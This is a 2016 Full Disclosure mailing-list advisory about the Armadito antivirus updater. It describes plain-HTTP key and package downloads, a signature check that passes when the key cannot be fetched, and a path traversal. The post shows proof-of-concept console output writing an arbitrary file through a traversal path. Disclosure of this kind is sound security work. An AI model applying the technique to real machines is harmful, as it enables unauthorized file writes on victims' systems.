Full Disclosure mailing list archives
Aramadito remote arbitrary file write in case of MiTM
From: <thedeadcow () tutanota com>
Date: Mon, 27 Jun 2016 18:33:15 +0100 (BST)
Armadito (https://github.com/armadito) is a cross-platform open-source antivirus, that was originally the DAVFI project, financed through a french government program. As a security product supposed to protect computers against malware, its update system fails at multiple points: * the public key used to check update packages is retrieved using plain HTTP. The same goes for the packages themselves. * if Armadito can't download this public key, a bug makes it consider any file it checks as valid (you don't even need to forge a signature) * a vulnerability as old as the General de Gaulle (path traversal) then allows to download a controlled URL to an arbitrary path All this allows someone in control of DNS answers or more generally in a MiTM position to write arbitrary files when the update process is performed. It also allows the editor to do it if they want (but db.armadito.org does not seem to work at the time of writing this email). A simple python HTTP server is attached to this mail as a proof-of-concept. This happens in the ArmaditoSvc tool using the "--updatedb" flag. The documentation doesn't specify if this should run as an administrator or not. Here is an example of the output of this tool when a potential MiTM is performed: =========== C:\tmp\armadito>type ..\cow.txt File specified not found. C:\tmp\armadito>ArmaditoSvc.exe --updatedb --------------------------------- ----- Armadito Scan service ----- --------------------------------- [+] Debug :: UpdateModulesDB :: description file downloaded successfully! [+] Debug :: UpdateModulesDB :: signature file downloaded successfully! armadito[4624]: <error> [-] Error :: download_pub_key :: URLDownloadToCacheFileA failed :: error = 0x800c0006 armadito[4624]: <error> [-] Error :: verify_file_signature :: Can't download public key from armadito server! armadito[4624]: <error> [-] Error :: verify_file_signature :: Crypt Destroy Key failed! :: GLE = 0x57 [+] Debug :: UpdateModulesDB :: File Signature verified successfully ! [-] Error :: GetFileContent :: Opening the file failed! :: error = 3 [+] Debug :: DownloadPackageFiles :: Downloading file from :: http://127.0.0.1/cow.... [+] Debug :: DownloadPackageFiles :: cache filename = XX\AppData\Local\Microsoft\Windows\INetCache\IE\3YTFPC0U\cow[1].htm [+] Debug :: ConvertBytesToChar :: string = 4dc9a4320e79db56894c037f27d5dc0a [+] Debug :: DownloadPackageFiles :: checksum = 4dc9a4320e79db56894c037f27d5dc0a [-] Warning :: no notify handler! :: call a6o_notify_set_handler first [+] Debug :: UpdateModulesDB :: Armadito service suspended successfully! [+] Debug :: get_db_module_path :: completePath = C:\tmp\armadito\modules\DB\..\..\..\..\..\..\..\..\..\..\..\tmp\cow.txt Conf_file = C:\tmp\armadito\conf\armadito.conf [+] Debug :: init_configuration :: conf file = C:\tmp\armadito\conf\armadito.conf armadito[4624]: <warning> cannot open conf file C:\tmp\armadito\conf\armadito.conf [+] Debug :: Configuration loaded successfully! [+] Debug :: Armadito structure loaded successfully! armadito[4624]: <error> [-] Error :: FilterConnectCommunicationPort() failed :: errcode = 0x80070002 armadito[4624]: <error> Scan Thread initialization failed! armadito[4624]: <error> Service loaded with errors during pause. [+] Debug :: UpdateModulesDB :: Armadito service resumed successfully! armadito[4624]: <error> [-] Error :: SaveHashInCacheFile :: Creating the cache file failed! :: error = 3 [+] Debug :: UpdateModulesDB :: Modules Database updated successfully! [-] Warning :: no notify handler! :: call a6o_notify_set_handler first C:\tmp\armadito>type ..\cow.txt put_your_dead_cow_here ============== This is an irresponsible disclosure due to irresponsible spending of the French people's money. The Dead Cow.
Attachment:
serv.py
Description:
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- Aramadito remote arbitrary file write in case of MiTM thedeadcow (Jun 27)